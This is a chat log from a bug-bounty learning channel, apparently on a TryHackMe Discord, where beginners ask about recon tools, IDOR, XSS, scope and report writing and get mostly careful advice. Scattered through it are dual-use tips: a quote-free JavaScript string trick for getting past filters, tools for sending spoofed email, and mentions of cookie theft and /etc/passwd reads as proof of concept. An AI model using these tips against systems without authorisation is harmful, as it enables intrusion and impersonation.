#bug-bounty

Hello everyone, I have scan a target with subdomain tools like amass and fidomains .... i got big list of subdomains the i filter the subdomains list with sort cmd to get unique subdomains
Now i am trying to get live subdomains with httprobe tool however it's taking long time to finish "still running"
I did try httpx but error show up says missing http:// and https:// missing
Any idea how to fix httpx or make httprobe faster ?

i solve the issue, i just remove it and download it from github repo

I think Bug bounty is dead once Ai takes over code review

It's just a Random Thought

I don’t think it will, humans will always make mistakes

We have automated code review and software testing practices.

It's already here. And not something wishy-washy like AI.

Hello mates I need help with a JSON csrf vulnerability in change user profile details that can potential lead to attack takeover, it’s been hard coming up with a poc that work

when a company puts vulnerabilities out of scope but no vulnerability in scope does that mean any vulnerability is accepted?

No, Anything not listed explicitly as “in-scope” is out of scope.

That’s not entirely true

I think the Company would point out "Everything except out of scope is permitted"

If a company says that a vulnerability is out of scope (just as we do) it usually means that those specific bounties are not in scope but everything else is fair game.

It’s always great to check with them

https://help.tryhackme.com/miscellaneous/the-bug-bounty-programme

Well, this confused me:
https://www.bugcrowd.com/blog/understanding-scope-for-higher-payouts/
There's a quote "Anything not listed explicitly as “in-scope” is out of scope." But anyways, doesn't mean It's always true

As I said, check with the company, but a company isn’t going to list every single vulnerability that should be in scope, they’re just going to say ‘xyz is not in scope’

Yeah, makes sense. Tanks

General question: can anyone point me to a few good resources regarding IDOR. Found a few online but either the info really doesn’t explain much or the concept misses it’s mark. Been trying to get better at it.

what question do you have about it?

Let me get some resources for you

https://tryhackme.com/room/idor and https://portswigger.net/web-security/access-control/idor

These seem pretty good

Thank you, some of the materials I’ve been reviewing seem to not go deep enough to better get a grasp on how I can better look for opportunities of using IDOR related bugs. So been wracking my brains on how to better approach them from a methodology/process aspect

Gave +1 Rep to @lilac spindle

always look for dynamic parameters that are accessing resources

IDOR is not necessarily limited to incremental id

I think this is where I got hung up on. Thank you very much for the assist

anyone anticipating openai to get on the bug program soon?

theres rumors that people will be incorporating it.

Alrightly, so far I'm able to make a very basic request to any (?) URI it seems - where could I go from here, could it lead to XSS or something better?
Currently, I've tried ../../logout which doesn't work because it needs an extra step....but ../../join/group which basically means that if you visit the profile it'll send a request and join the group. The URL is loaded via an <img src tag....I tried using javascript:xyz but it filters :, it dosen't filter ;

Hmm, seems it proxys the URL through its own domain first unless you enter the site..so site.com/xyz doesn't get proxied but externalsite.com/xyz gets proxied to site.com/proxy/externalsite.com/xyz/

Hey guys quick question if a website doesn't have user sanitation for xss on a password reset would that be a bug as it calls to databases giving the password and storing it and could be used for malicious code ?

Its unlikely for passwords since they are most likely hashed when stored in the db

That's what I was thinking but in networking you see the password in plain text in the payload section

of course, u are intercepting the HTTP request

the password is not echoed back to the website

Wrong thing

The password is giving in plain text to other websites before being stored in the dB as a hash

How are you sure about this?

Can you explain it a bit more clearly

I'm trying it's just a bit hard

From my understanding, yes when you type your password its in text inside the HTML form

When you also send it, its not sent as a password hash through the HTTP request

That's because the hashing should be done server side

When your resetting the password using an xss it is being echoed through the server clients and when we look where it goes before being stored we fine different websites it has been going to in plain text

how do you know If it's casted to whole clients

This could just me being dumb though

We follow the trail and it sends the http request and the website saves it were we are unable to have access to

But It saves as hash?

No plain text as far as we can see

I seem to not grasp what you're saying

Are you saying you are resetting a password, the password is sent to different websites and then saved?

That's fine I'm a bit hard to understand but I know what I mean

Okay, if I understand it correctly, you reset password -> password sent to different website -> saved in db

It has no user sanitation and can send different payloads like an open redirect and has password in plain text being sent across the website not encoded or hashed

I think I can do a cookie exfiltration

Hmmm, so when you do a password reset, the password persists within the website

It resided into the website going to different sub domains

more than 1?

It goes to 3 or 4 different sub domains

Before stopping

Even if we entertain this idea, it could be a case of self XSS

How sure are you other users are able to view the malicious password

65% sure other users will be able to view the malicious code

I mean, Aren't passwords hidden? So that means nobody can see it?

Do a test with a different account if they're able to view this

If someone can see your password, That's an another vuln

The passwords are hidden until the xss is executed

Most probably, an admin user can view this but that's a different case

I mean, the first goal is if you're able to execute it

If its possible, check if other users can see it

I am able to get the xss to execute and give me the password after it has been hidden or encoded or hashed can't remember

Others user aren't able to see there passwords so it's probably a self xss right M

?

Yep most likely

An admin user can PROBABLY see it, not sure how the admin panel would work

Yup

So I guess not a bug M

?

I don't know if you should report it or not. I'm new to bb as well

Its a bug for sure, just not sure if they'll triage it

Yeah ok I'll just email them and see what they think

BB payments are dependent on impact

Big impact -> Big money

Yea

Also you need to write a good PoC if i remember correctly, right?

Yes

Like it might just be the payload on my end only showing local passwords

If there's a section about user accounts and their passwords in Admin Panel, then Admins can see it

Otherwise It's stored in the database hashed

I'm pretty sure I saw other passwords too non hashed

Make sure first

Ok I'll try to replicate

They fixed it

Someone else reported it they said

sad

@lilac spindle @shrewd ocean

Yea

There's no report yet as it's new and not disclosed

So I guess now anyone want to collab of some sort and try to find bugs on a website your choice

Awww nice try

At least you found it

Yeah, I haven't found anything yet lmao

But if they fixed it, how come its still there 👀

I think I'll change my target, the scope is so small

Where you hunting at

https://www.airmap.com/legal#responsible-disclosure-notice

not that small but I couldn't find anything to look at

aaaaa, its ok, take your time

the api can be a juicy space

are there ways to tell if an application uses nosql?

Wym I just got told they fixed it so I stopped trying it

Is it working now?

Last I checked yeah it stopped allowing me to reset user password as a xss or link or any open redirect therefore adding sanitation

rip

Want to try a target and find bugs later

I'd like to but I don't really have a spare time

Ah all good have a good one thanks for your input

how long did it take you all to find your first bug in a bounty program? just curious..

Hi all
I am completely new to THM.
Can I ask if there is any room for Bug bounty in THM?

Nahamstore is probably one of the rooms closest to bug bounty.

smart one

I have a webapp related question, am I at the right place ?

shoot

if a developer made sure that all inputs are sanitized completely and that the output is sufficiently encoded, is there any way at all that an XSS could still exist ?

Depends on where the sanitation happens

If it's purely client side, then reflected and/or stored XSS is still on the table

so the key to COMPLETELY get rid of XSS is to have a server side sanitisation and output encoding ?

Both sides should have sanitation

Also escaping output

are you saying that if there is sufficient encoding on output there is no way to have XSS at all ?

Thank you

Gave +1 Rep to @unborn ice

Ah, I didn't see that part

How do you define sufficiently encoded tho

From what I understand, its still vulnerable if the sink is being used in a dangerous context

Believe it or not, this is actually bad practice.
Sanitising on input means you often end up with multiple layers of encoding (e.g. double url / HTML entity encoding, etc), and makes it much more likely that you mangle legitimate user input. For example, in an SQL sanitisation context -- what happens if a user password includes an apostrophe? Perfectly legitimate character to include, but as a worst case scenario you would be silently stripping that out (assuming you sanitised the raw input before hashing) and resulting in the "wrong" password being stored.

Best practice would be to store the data raw (within reason) and sanitise on output.

A lot of templating engines (e.g. React client side, Jinja2 server side) virtually eradicate HTML injection vulns by default, which makes that practice a lot easier to adhere to.

TL;DR: don't try to sanitise stuff with home grown solutions. Chances are your renderer has a better tried-and-tested solution built in.

Seconded. If you have write your own validators, they belong on server side where they are much less likely to messed with. Client side, maybe encrypt with a symmetric key but really, it's already encrypted in-transit if TLS is properly set up

I get that, what do you mean by within reason?

Like expect what type of input the app should receive?

"Within reason" was just to qualify that I did not mean just store things without validation.

e.g. if an input should only store a whole number, that should still be validated -- not least because it'll throw an error in the DB. Same thing for something like space restrictions on a comments field.

So basically: if a user input meets the logical requirements of the field, then that is what should be stored (unfiltered, but in a safe manner -- e.g. parameterised queries). It should be sanitised on output, which is handled automatically by many templating engines.

Yeah I get that, many devs I see still stick to using their own type of validations

Custom validations sure, if needed. Those are often quite niche, so as Juun said, if you gotta write your own validators, just do it and make sure it's server side.
Sanitisation filters, on the other hand, try to use the standard ones. Those are rigorously tested, and if anyone finds a bypass it will be assigned a CVE and fixed quickly.

@worthy folio also the same

Also a reason to use an ORM - writing queries directly in the code is almost always going to end in tears.

True indeed!

ORM good, direct queries bad

what is the vulnerability called when the server issues a 302 redirect but leaks the html source code of the requested resource

I think I've heard it called execute after read

But it's one of those things a lot of people don't seem to think about or notice

Execution after redirect... https://owasp.org/www-community/attacks/Execution_After_Redirect_(EAR)

hey! I'm new here.

Hi New here, I'm Scrubz.

hello

Hi guys, want to ask, is http request smuggling still around being find on bounty? Does learning it gives higher chances of finding bugs?

Or does it rarely happen and just focus on owasp top 10 if targeting bounty?

owasp top 10 doesnt really mean anything

learn as much as you can, expand your attack vectors, that will give you more chance of finding bugs, if you have more bugs to look for

so yeah, its still worth learning

What is the most common vulnerabilities found in bug bounty in ur opinion?

OWASP top 10

Broken access control, XSS and IDOR personally

Is this anything valuable

... what are you looking at?

Not to me no but please do a better job at censoring it

You forgot to account for the title bar at the top

And using a red line does not censor the key

The response of a 403 bypass attack on a bug bounty target

Thanks
Will remember next time

Gave +1 Rep to @fast fable

I think sparrow is some kind of api.
And it's key is leaked

well, maybe look up surveysparrow

been given an assignment to perform the five stages of pen testing on a company on bug bounty and to find a vulnerability/ bug

any tips on bug hunting/ relevant thm rooms to do? have no clue where to start

kind of hard

Assignment from whom?

illegal to boot also

on a company on bug bounty?

to do the 5 stages of pentesting?

i havent seen a bbp allow someone to have persistence

4th step is usually persistence

Not according to that one, so perhaps they're running off a different list to you.

The person can speak for themselves regarding that

Perhaps, @fallen palm were they specific in what stages they meant

my target from h1: *.example.com
rDNS record from nmap scan: xxx.amazonaws.com

• Can I test that xxx.amazonaws.com site? Aren't they same?
• I can not find any clear indication from the targets h1 policy.

what are the out of scope targets and attack methods?

No, example.com is not amazonaws.com

If you’re unsure about your contract, email them.

If the website gives me an application error is that a sign of a bug?

Depends, is it replicable? Is there anything revealed in the error (paths to files, database stuff, code)?

university assignment, not expecting people to help me to do it just more how you guys approrach finding bugs on bug bounty websites

(Reconnaissance (both passive and active), Scanning, Gaining Access, Maintaining Access,
and Reporting)

Yep, gaining and maintaining access is not allowed most of the time.

Just stick to a PoC which showcases that the exploit is possible

Kind of like whoami, a DNS lookup, reading /etc/passwd, etc.

alright cool thanks

if you find a windows active directory panel is that something that should be reported?

Yeah, its an exposed service that shouldn't be exposed

what does information disclosure mean in bug bounty

Website is unknowingly leaking information.

portswigger web security academy

oooo i also recommend the htb bug bounty path

~~Or knowingly and they just couldn't be bothered to fix it ~~

But... Does the website know it's leaking? 🤨

I'm always seeing the bug type "Via localStorage/sessionStorage" being found on BugCrowd. And I understand it has to do with a sensitive token being stored in the local storage or session storage of the browser. But at what point does this constitute a bug, and how is it found? I can barely find any information on it online.

for e.g., there is some value isAdmin set in the localStorage/sessionStorage and front end checks what is the value from there, if its false, no access to admin panel, if its true, you get access.

it becomes a bug depending on how the data in it is used. in Chromium-based browsers, i think its stored in the Application tab in DevTools

i mostly find those by reading through javascript files

@lilac spindle Thanks for the reply. I can see how that would constitute a bug for sure. What about the storing of a sensitive token, i've seen devs advise against that, but that's not inherently a vulnerability right?

Gave +1 Rep to @lilac spindle

It means the token is accessible to JS, like in the case of XSS, but the app's design might require that

Yeah I've submitted bugs where I've stolen tokens with XSS, but the actual storage of the token doesn't constitue a P4 right? only like Mknukn said, where it's some sort of sensitive, changeable value?

I wouldn't wanna submit a vulnerability where I'm like, "hey, you're storing this token in localStorage, that's not good" and them mark it not applicable or P5

I mean I'd be inclined to agree yeah

for sure, thank you @vocal folio

Gave +1 Rep to @vocal folio

unlike cookies, local storage doesn't really feature any access controls except from origin

true

It's a finding, although possibly not one for bug bounty? 🤷‍♂️
Ideally the architecture of the backend should accept tokens in a format where they can be handled entirely by the browser (i.e., cookies) rather than requiring JS to be involved with sending them.
That said, for bug bounty you need to demonstrate impact

Its not inherently a vulnerability. If a website is vulnerable to XSS, they have bigger problems than that

Modern JS frameworks and bearer tokens complicate that one nicely

When you wanna use hydra for a brute force attack you had to give a password.txt but what's is the path or where can I put my file ?

Brute force in a bug bounty?

🤨

It’s in a formation to become a pentester

What do you mean?

I think it’s logic

Brute force is banned in 99% of bug bounty.
What do you mean?

What are you trying to brute force?

It's for a school training what I said

That's not bug bounty related. This channel is for bug bounty.

i's the same things

It's absolutely not.

Please go to your teacher or training provider for help with their content.

ok.

hello everyone
so im trying to find a vulnerability in mySQL 8.0.18, but each one i find it mentions "MySQL Server product of Oracle MySQL ", can anyone explain that to me, or whether it would be considered correct? thanks alot

Stored XSS

start

CSRF

a scarab...... shadow kept it in a tank for about a 1 year before it died

wow

that's.. something

probably the wrong kinda bug now.... should have checked the channel name

hey y'all this seems like the most competent BB discord i've been in so I figure i'd see if anyone wants to collab. I'd consider myself intermediate. I've got 165 points on bugcrowd, and im good with IDORS, XSS, and oAuth vulnerabilities. Hoping to collab with someone of the same skill level. it doesn't have to be bugcrowd, it could be hackerone also

for gobuster does anyone know if 1x request = 1x thread? So --threads 300 would mean 300 requests per second?

If not how would I best limit my requests per second? Like would it be a combination of --timeout %ms and --threads being lower than default 10?

ended up keeping default thread of 10 since it didn't go over the limit of requests per second

threads are concurrent requests @fallen palm

if you have it on 2 threads, that means you're allowing it to send 2 simultaneous requests

if you set it to 300 threads, it will allow 300 simultaneous requests, permitting that your machine/internet can handle that

it has nothing to do with seconds

alright cool thanks

Gave +1 Rep to @quick berry

Hi everybody ☺️

if a xss payload is showing in the source code does that mean it’s a reflected xss?

depends if it's stored or not

reflected xss is non-persistent (not stored on the actual web server itself)

compare an xss payload in a search bar vs a comment section

both show up in the source code but only one is stored in the web server or application

I found this info here on DOM XSS (reflected vs storeed) for instance because DOM XSS can appear in the source code

Here is the link: https://portswigger.net/web-security/cross-site-scripting/dom-based

I have a question, if a domain is in the program scope of a bounty program am I okay to port scan that server?

you're likely just scanning the WAF or CDN

which is useless

Hi

alright thanks guys

true

hi guys chai pilo

hi

where should someone insert xss payloads? In search bars??

in order for the xss to be successful, your code needs to be executed

if it's just reflected on the source code, that may just be intended functionality

You need to understand how the vulnerability arises, how it pops up in modern day web applications, and also where you can most likely find them

You also need to understand how it should be patched so you can give suggestions to them

Really? I wasn't required to give any suggestions on how to fix it for mine

It's not required

I saw in the 'SQL Injection' room they have a 'Remediation' task at the end. Super useful! Love it.

Incase you find SQL vulnerability

How to set up gitlab for debugging? I have started hunting on gitlab. so, If anyone can help please reply.

hi, how to start learning about bug bounty?

Hi, check the pinned messages 🙂

I have a in-game crash that I can repeat. Resource exhaustion or unprocessed error handling.

Done!

Do you do this by sending a lot of requests?

what’s a false positive?

A false positive is something that has been incorrectly setting off an alarm or a rule set.

For example.

Someone incorrect entering their password will set off a "brute force attafk" alarm.

thx

guys if I want to put a header for example X-Forwarded-For: do I put this in anywhere in the request in burpsuite?

example of request headers

so I can put it anywhere?

Somewhere between 2nd line and 13th line for this example

hi guys
how to start bug bounty?

👌👌

is there a way to have the features from instagram android on PC

I want to see a request on burp and I dont know how to do on PC, because the "notes" feature doesnt exist

Does instagram have a bug bounty program? @patent glacier

Thanks THM (muiri's room specifically), just did my first SQL Injection through Burp

time to apply this on real websites

I've been sleepin on Burp

Android apps tend to call HTTPS APIs

I.e. burp works as well on android as it does on Windows. Weirdness with CA cert trusts and cert pinning aside

Yeah, Facebook has a bug bounty program that include even the instagram

hey anyone trying to configure the rengine tool?

can someone tell me what are some good books to read for bug bounty

Because I’m always spending a lot of time on a website and I can never find anything if someone can tell me some tips to I would really appreciate it

Sure, checked the pinned messages and this:
https://www.bugbountyhunter.com/methodology/zseanos-methodology.pdf

Hi has anyone tested an application form on a bug bounty program before? I want to test an application form which also asks the applicant to upload a file. But I'm not sure if I should because I'll be spamming them I guess... any advice?

Check the scope

Hi guys, I want to get the @zealous radishcrowdninja.com id for a bug bounty. But I don't know how can I get this id.

You just just @ someone lol

What's the FQDN for this bug bounty?

What are some good YouTube channels to follow for BugBounty?

i found a potential subdomain takeover and checking EdOverflow/can-i-take-over-xyz it seems likely to be vulnerable and from nuclei it says vulnerable but the thing is i need to spend $40 to takeover it and the program doesnt offer any monetary reward is it good to go for it ?

Depends, is 40$ alot to you?

kinda but i think i could spend it in other way such as buying exam cert or some course for maldev

OK, and why are the 40$ needed for the bug?

to create a custom domain you need to pay $40 on pantheon

Do you currently follow any? I personally follow Nahamsec. He has a pretty good bug bounty channel.

And the custom domain is for?

To prove subdomain takeover

Although I'm sure you could speak to them and show that in theory you could take it over

https://medium.com/@hussain_0x3c/hostile-subdomain-takeover-using-pantheon-ebf4ab813111

Yeah, I agree

i tried that once but it was rejected

If they don't listen to you, and don't pay out, don't waste your money on them

Guys, can someone suggest a good alternative to https://anonymousemail.me/
This was earlier free to send spoofed mails ig but now it's paid
Anyone suggest a free alternative with functionality to send mails by changing sender address

sendmail

Can u please describe is it a tool or site and how to use
I googled it but still confused

I mean, I'm trying to figure out what you could possibly need it for...

POC of SPF missing flag

Eh, fair.
Sendmail is a linux CLI utility

For this kinda thing you would probably be better with a python script though

smtplib

Okayy, thanks mate

Np

hi everyone

i have been confused for months , i like verymuch penetration testing especially system penetration testing and network but In egypt unfortunatelly , it is very rare to find freelancing job as a freelancing so i decided to dedicate myself to be parttime bug hunter so any thoughts please for road map of being bug hunter ?

Learn web application security from Portswigger Academy

Sadly, bug bounty does not include system and network testing, it is just application pentesting (mainly web) I aggre with Muknukn, after you finish the academy, I recommend you explore OWASP and their top 10 list.

Read the OWASP Testing Guide

Read about how these vulnerabilities are patched

ok thanks guys for your help but am i suppose to be web application programmer ??> cause i see alot of programming code ?>

It helps a lot

anyone guide me please that how can i get practice for bug bounty on platform like bugcroud and hackerone ??

read this 🙂

Hello
I'm writing my first bug bounty report
And I found a way to unsubscribe everyone from the mailing list
Under what catogary does this fall so I can tell the severity of this vulnerability
Is it broken access control (BAC) or authentication bypass
It was a JWT in a url

I think BAC is most accurate

Thanks

how to bypass login page ?

Of?

learn about the techniques

sql injection, xss, session hijacking, brute forcing, etc

just don't go using it on places you shouldn't

there are companies that have programs so hackers can try something on their products and report it (maybe receiving some money back as well)

ok

take a look at this https://tryhackme.com/path/outline/pentesting

this learning path assumes you have basic cyber security knowledge

status "405"
title "Method Not Allowed"
detail "HTTP method is not allowed"

is there any way to bypass it ?

Where did you see that?

while testing a web

I was thinking that's the response you get from trying to access the attackbox but I'm sure that's 504

no

405

only showing

HTTP method is not allowed

Nah it's 405

You're using the wrong HTTP verb

https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/405

Yeah, I follow him

Do you follow any other bug bounty channels?

HEY EVERYONE I FOUND A BUG BOUNTY NOW WHAT DO I DO

I THINK ITS A BIG DEAL

I guess you gotta make a report now where you show the bug with the impact included.

Please keep me notified! I'm interested in how your first bug-bounty goes. I still hve a long way to go myself..

Hey guys
I have a question .... i started my hacking journey years ago just for fun and as a hoppy but a year ago i intended to become a professional bug bounty hunter in webhacking
I know linux , learned how to work on a lot of tools of linux
And learned a lot of networking
Learned html css and javascript and still learning about html css and JS

My question is how much
html css and javascript needed to start at web hacking bug bounty is there anyone that can help with this because i really don't want to learn things i don't need as a beginner bug bounty hunter like next.js and react.js etc if i don't need them in the first place .
Anyone who helps me with this ill appreciate it a lot

I think there's a lot to realise about bounth hunting here.
Firstly, it's not stable income. It's not feasible, nor is it meant to be, to use it as a main job unless you're in a country with a very low cost of living.
Secondly, with practically all hacking it's about how well you understand systems and how they work and fit together. Any learning that you do helps with that goal.

How do you send the message? Do you have like a template

I totally agree with you ...
To make a living in bug bounty in north america or europe you have to be very skilled ...
But i live in syria and 500$ every 2 months is very good here it might be every week or month it depends on my time and skills

no..

What sort of vulnerability is that if i can access other people's document using URL which I'm not meant to access
Eg : url/1
url/2

What's broken access control ? How's it different from IDOR

@lapis horizon

Thanks ❣️ @lapis horizon

https://www.google.com/url?sa=i&url=https%3A%2F%2Fwww.prplbx.com%2Fresources%2Fblog%2Fbroken-access-control-vs-broken-authentication%2F&psig=AOvVaw3UV4zvVl19WIH9z-1roRkR&ust=1679207774627000&source=images&cd=vfe&ved=0CA0QjRxqFwoTCKCJmsru5P0CFQAAAAAdAAAAABAD

Congrats and blippy haha nice

hii guys

can anyone help me to solve this error

when i type httpx it is showing the same error

but to check, it is install correctly or not , i did httpx --help

so all the commands are visible to me

help me someone

You need to give it a URL

Piping it won't probably work

It works like httpx https://tesla.com

what's httpx?

"A next generation http client" according to the screenshot about 10 messages up

7. actually.

can burpsuite be used with google or does it have to be firefox?

You can use it with google.

Just add the foxyproxy extentension and then set the port etc.

ok

There's Burp Browser built in which uses Chromium

^ and that.

wdym?

I just finished setting burpsuite but every time I want to intercept a website it keeps telling me that my connection might not be safe what should I do?

ohh ok

...
For the sake of everyone whose web applications you're thinking of searching for bugs on, could I suggest that you go and learn a little about how the web actually works before you start flailing around for a big payout..?

Specifically in this case you will want to look into how web requests are secured, TLS, how browsers respond to invalid certificates, etc.

There's no point in trying to hack stuff if you don't understand the fundamentals behind how they work. You're just going to frustrate yourself at best, or unintentionally cause damage to something (and thus cause some poor sap a huge headache) due to lack of comprehension of what you're doing at worst.

Neither of those outcomes are desirable.

I've been starting in information security for a short time (one month) do you have a tip for beginners who are learning about the web, not forgetting what they learned after a while?

For sure 🙂
First up, for "not forgetting what you learned after a while" take lots of notes. Your notebook (regardless of what format you use) is going to be your most valuable possession in this industry. You should never solve a problem or learn about a topic twice -- note down everything in a nice indexable format and you'll go a lot further a lot quicker.

In terms of learning about web stuff, I would honestly recommend setting up a lab, if you can. VMware / VirtualBox with a linux virtual machine inside it. Install Apache2, and learn about how a traditional webserver serves content. Build a simple website with HTML, CSS, raw JavaScript, and PHP. Google whenever you have a question. The MDN docs (Mozilla) are an absolute goldmine of information.
From there learn about some more modern tech stacks -- software defined routing, for example, in NodeJS (Express) webservers, Python Flask / Django, etc. Expand out from there.

Cryptography is a tricky thing to learn to begin with, but once you understand it, you won't have to worry about it changing. It's the same regardless of how the webapp is built. Follow some tutorials for implementing self-signed TLS certificates using OpenSSL on your Apache webserver. Understand what you're looking at. Read about the types of warning you might encounter. One of them (the same one that K hit yesterday) will pop up immediately with a self-signed certificate. Read into what it means and how it can be avoided. Basically aim to have a working understanding of what can go wrong with TLS and what to look out for.

Bonus points if you also set up a VPS (virtual private server) on something like AWS or (the easier and cheaper option) Digital Ocean then use Let's Encrypt (hint: certbot) to request a certificate with a proper chain of trust.

Then mess around with Nginx, or Caddy (or hell, even Apache if you really must) for something like a reverse proxy and/or load balancer in front of a webapp written in Python/Node/Golang/whatever, A) to get a better idea of how things are more likely to work these days, and B) to get experience setting up different webservers so you understand how they work and again, what's likely to go wrong

The important thing to remember with any kind of hacking is that all we are ever really doing is applying the same skills as a sysadmin / developer / cloud engineer / whatever in a very specialist way.
"Hacking" as a discipline is just an extreme focus on development and administration from the mindset of trying to test and break things. If you only learn how to attack but never learn how things actually work, then you'll never be more than mediocre. The more you understand about how the systems you're looking at function, the better you will be.

thank you very much, looking forward to trying my best here with your tips, thanks again

Gave +1 Rep to @hybrid orchid

Np 😄

Guys, i have just started exploring bug bounty
I wanted to know why missing SPF records isn't considered as a valid bug ?
I feel it's a actual vulnerability as any attacker can spoof and impersonate the company thru it's email and defame them, can also affect the reputation (similar to how people brought verified badge on twitter fake accounts and destroyed few companies stocks value)
Reporting this to the company, they don't even recognise it as a bug and say it's intentional 😂

I really wanna know the reason why this vuln is so underrated.

Thanks 😊

Gave +1 Rep to @hybrid orchid

I wonder if you've attached a POC to the report (if that's allowed). Maybe showing them the actual impact it has would make them change their mind?

https://systemweakness.com/email-spoofing-due-to-invalid-spf-record-vulnerability-e53ede4e758e

I found this writeup online that shows how this vulnerability could be leveraged, this person was able to report it on a bug bounty program

Yea attached POC, they are like it, it's intentional

Odd, I assume they do have an email server so I don't understand why they say it's intentional. Either way, likely best to move on then if they don't care

Exactly... even i wanna know the reason why they are ignoring it
Plis some pro hunter here pour some light on this

We can't really speak on behalf of the company and their specific reasons

No, i mean it's not just one company... Almost every company has stopped recognising it as a vuln ig
Any particular reason

So let me play devil's advocate for a moment. Why not move on to finding other vulns if SPF isn't something in scope for the companies you are working with? If you look at something like BugCrowd's Vulnerability Rating Taxonomy, an SPF is a P5 at best. It's not a truly impactful vuln considering all the risks to apps and infrastructure that is out there.

Does TryHAckMe have a bug bounty program

yes

Is it one of the learning paths

no... wait a sec

https://help.tryhackme.com/en/articles/6495946-the-bug-bounty-program

Yeah was wondering if their was a learning path like the Jr Pentester

oh you wanna learn how to do bug bounty??? would point you towards #web-fundamentals-path then as that explains the majority of bug bounties people get on the web

ok cool thanks

Gave +1 Rep to @little meteor

no problem

One more question I am almost done with the Jr. Penetration Tester program would doing the Comptia Pentest+ help me in becoming a Pentester

yes but you will have the majority of that path already done after juinor pentester... still it will help you get said cert by giving you some of the knowledge you would need while doing said certification

Think I will do that one too never hurts thanks

You should also read the pinned message in this channel, has some really good suggestions for what you should do, which is appropriate at all levels, but I believe after you finish Jr. Penetration Tester path and Web Fundamentals path is the best time to start using the resources mentioned in the pinned message.

thank you

Gave +1 Rep to @shadow matrix

No you cannot hack any wordpress site

@worthy folio , the person also posted on multiple channels of the same question

@analog glen

What are you trying to do with the wordpress? which site?

account made same day it joined this discord
asks about how to hack wordpress

hmmmmm

Rule of thumb is, if you don't have a written and formalized contract to test a site, don't touch it. If you can, lab it up at home.

Carefully read all your TOS, EULA, and other agreements with your cloud provider before doing anything.

@analog glen , @worthy folio

So one won't be able find bugs on WordPress based sites ?and a waste of time attempting to do the same

I never said that

Do due diligence whenever doing a security test. Legalities, scope, awareness, etc. should be followed

Adding x-hackerone header in burp: Proxy -> Options -> Match & Replace

hello everyone, I would like to ask about threat hunting

currently I am trying to do an external threat hunts, where I don't have any access to the target environments.
I would like to know, how can I find any kind of leaked information for instance, gitlab projects.
do you guys have any suggestions on how to start, what to know to help me through this process?

thank you 🙂 (I am a beginner)

saving this for later

Hey guys, i alreday asked the question in general but go no answer:
Does McDonald's have a security email, where you can report a bug?

or do they have a bug bounty

I'm sure this is very easyy to search on Google.

i did, found nothing. So i asked here if by chance someone does know

https://www.hackerone.com/company-news/dear-mcdonalds-wheres-your-security

Doesn't seem to have one

So I wouldn't do any poking around

Chick-fil-A doesn't seem to have any either

maybe its a trend

@lavish hollow

@paper ridge This is not a place to self promote

Sorry where can I share ?

Not here, you need to interact with the community before promoting your content

if a download link for sm user's private file on a website can be used by anyone without authentication is that a valid bug

i think it depends on what user and is it for all users or only one?

if it's only one user then it's there for a purpose

Like for example some photo editing website and when i download the photo that i edited and intercept the req, the link that i get can be used by anyone to download it without logging in

well from what i understand, in this case it's not good for customers / clients privacy.
Although it doesn't damage the website or make it vunl

But if the enterprise really care about it being successful then saving customers privacy is a must

im not confident with what i say so i recommend u to ask more knowledgeable ppl

Is the link random and rate limited? If it is then it I wouldn't say it is a vuln

anyone intrested in collab??

Plz do report it

Getting access to private files is not normal behaviour

Yes but your intercepting the request? The only way to do it is for you (the user) to manually get the link and send it

It's like doing Self-XSS

How else would you be able to download the image 😆

If the link is ungessable, and proper rate limiting exists, then practicly no access is given

How to get into advanced bug bounty?

I have completed one course from ZTM and doing Tryhackme me currently.

But i still don't have a clear picture about bug bounty or how does one find bugs

Any recommendations?

Bug bounty is basically just web penetration testing, the OWASP foundation and port swigger academy have great stuff about web pt, and the OWASP evan has a methodology you can learn, which I think is what you are talking about.

Hi everyone, i'm totally new to bounty hunting! finished a jr pentest course on THM not long ago.

Just wondering what recommendations you might have for a bounty hunting environement? Did you use your existing computer, run an environment in a VM, get a separate device etc...
I'm thinking of running a VM with kali linux to start off.

yes, Kali VM sounds good

I just used my existing computer

What environment are you working with on your existing computer?
My existing computer is windows 10. You didn't use a VM or any other environment to do testing?

Windows

no vm

just burp + windows

whats the point of setting up a bug bounty program if you are gonna have cloudflare protection on your site, it bugs me so much unless theres a bypass that im not aware of

wat

"checking if your connection is secure" 🤓 and then getting stuck in a loading screen for a infinite time 😂

Cloudflare is mostly there to protect against botnets & ddos type attacks

It's not going to save you from a logical error on your site

no ik

but it stops my burpsuite in its tracks whenever I do anything

Are you using the burp browser?

Have you tried loading onto the site

Then turning on your proxy

That's what fixes it for me

yeah usually its through the burp browser

oh actually? ill try that then

yes for some reason it doesn't like the traffic being proxied

But if you load into the site normally, (which then gives you the cf cookie), it should stop complaining

yeah makes sense

doesnt burp suite have a option to import cookies?

or would that not make a difference

That could work?

cf-token cookie

Try it and see!

We can't help you with CTFs, sorry.

@fringe wadi Please do not ask for help with active CTFs

Specify the item in the keychain

I want to do a test scan on openvas but I couldn't find where to do it. Could you help?

Does Acunetix allow this?

http://testphp.vulnweb.com/

why not

Seems fair, is this the IP for that website?

I hope 🙂

I was being facetious

Anyone has heroku paid account?

Why?

guys can anyone help me regarding this https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO-EN.html i have found the same but at domain level but i am stucks at this ## 0x04 Attack Docker API section from this blog as i have found a vulnerability on domain level not on docker api

its a minio console of the site

for example this https://minio.nopapersolution.com/

What bug bounty program has this in scope?

ya they have if i am able to successfully able to gain access into it

That's not how scope works

i did some research u are right i was trying to exploit it. but leave it but i got something new to know

that would go in #room-bugs... this channel is mostly for the action of doing bug bounty on other sites and discussions about that and sharing learning material...
anyways this is probably a known bug and hard to fix as the shodan website and scans are always updating so hence there are pictures in the room to refer to

Hi ! Can anyone suggest which THM rooms i would complete to get the introduction for bugbounty ? Thanks in advance!

The Web Fundamentals path is good

Hi Guys

Is there any alternative for kali bare-metal because i cant able to find in the website

Why Bare-metal?

so today I learnt

in javascript, if ', ' or " are blocked you can use /test/.source to craft a string!

super neat

is that in like general or for a specific thing?

just in general

Nice

^ https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/RegExp/source

and fwiw, I just got a bounty abusing this :O

i am doing the XSS skills assesment on hack the box but cant find anyone to help so ive come here anyone willing to drop a hint?

Why don't you ask their discord server?

i did

no reponse

Seems a bit of a stretch though asking on the THM discord don't you think?

Have you tried looking online for hints, in the form of writeups or something?

yep theres not many writeups so im currently asking chatgpt

https://medium.com/@ozomarzu/how-i-was-able-to-find-reflected-xss-f25fe1ea3134

